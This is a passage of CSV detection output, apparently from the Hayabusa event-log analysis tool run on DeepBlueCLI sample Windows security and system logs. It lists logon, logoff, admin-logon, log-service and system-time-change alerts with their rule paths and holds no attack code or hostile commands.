+00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:50:27.138 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.841 +00:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.841 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.841 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:45.919 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.263 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.263 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.669 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:53:46.669 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:54:01.732 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:54:10.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:55:25.000 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:29.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:35.625 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:37.450 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:44.840 +00:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:44.840 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 21:55:44.840 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:00:55.356 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:00:55.903 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:00:55.903 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:01:28.840 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:04:16.809 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:04:18.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 22:05:21.859 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:25.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:32.609 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:36.944 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:40.928 +00:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:40.928 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 22:05:40.928 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 23:11:15.779 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:29:47.424 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:32:12.657 +00:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:34:00.063 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:40:48.532 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:41:16.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-21 23:42:34.625 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:42:37.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-21 23:42:49.610 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:43:06.625 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-21 23:44:23.849 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 00:44:32.677 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 01:43:32.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 05:07:26.562 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:07:37.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 05:07:42.189 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 05:08:08.126 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:18:43.562 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:25:02.877 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:48:26.739 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 17:57:33.848 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 18:01:39.454 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 18:02:36.847 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 18:05:40.910 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:49:55.313 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:50:49.109 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:51:44.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 21:52:36.312 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:52:38.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 21:52:48.955 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 21:54:52.158 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:23:56.575 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:26:20.278 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:35:01.091 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:36:37.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:38:20.765 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:21.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:38:26.183 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:38:48.104 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:48:51.643 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:50:17.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:51:16.890 +00:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:19.000 +00:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-25 22:51:29.601 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 22:51:34.460 +00:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 23:03:14.476 +00:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-25 23:03:47.000 +00:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:34:54.687 +00:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:34:56.000 +00:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:35:04.667 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4648,info,PrivEsc | 